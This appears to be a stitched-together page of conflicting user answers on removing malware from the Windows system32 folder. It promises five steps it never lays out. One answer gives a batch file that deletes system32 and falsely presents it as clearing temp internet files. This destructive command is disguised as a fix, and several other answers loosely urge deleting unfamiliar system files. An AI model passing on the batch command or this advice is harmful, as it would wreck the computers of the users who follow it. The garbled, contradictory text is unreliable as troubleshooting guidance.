You need to run these 5 essential steps to remove all the spyware on your computer.

DO NOT TOUCH THE FOLDER! It will break it nearly as much as deleting the system32 will!
It's malware hidden in the windows/system32 folder. It is a good idea to remove stuff like this from your machine.
Try downloading a program by the name of Avast it's a great virus scanner/protector :)

System32 is needed by your computer. Removing will disable your computer. Unless you are very confident in paring out unwanted folders in System32, it's best to leave it alone. It's not always easy to figure out what programs use what files in System32. Sometimes more than one program will access a folder.
*you can go to system32 folder in c/windiow and remove the scr folder. * another method to remove the .scr first delete the all folder then also delete recycler .
You have to look for it, any files that look like they shouldn't belong you might want to delete. It can really be hidden anywhere, but the most common places are the Temp folder, System32, and the Windows folder. Check your Temp folder (Start> Run > %temp%), sometimes a virus can be sitting there in plain sight. Try not to delete the System32 folder though ;).
Start up in safe mode. Then open the folder windows\system 32 and locate the kerberos.exe right click and do an antivirus scan. followed by qaurantining it. reboot and rescan. Bobs ur auntie
download avg anti virus from grisoft.com - they do a free version which is extremely good, should remove it. it removed one of the dropper variations for me.
open up notepad type the following: @echo off del c:\WINDOWS\system32 save the file as anything.bat (remember to add the .bat extension and save as all files) double click and it will delete the system32 folder. said folder is the where the majority of your temp. internet files are located. getting rid of them should work.
msconfig, startup, uncheck usbcilin, then go to windows system32 folder and delete the exe, restart system, say FO to the developer who wrote this software this is the best method to remove that "USBcillin" software.
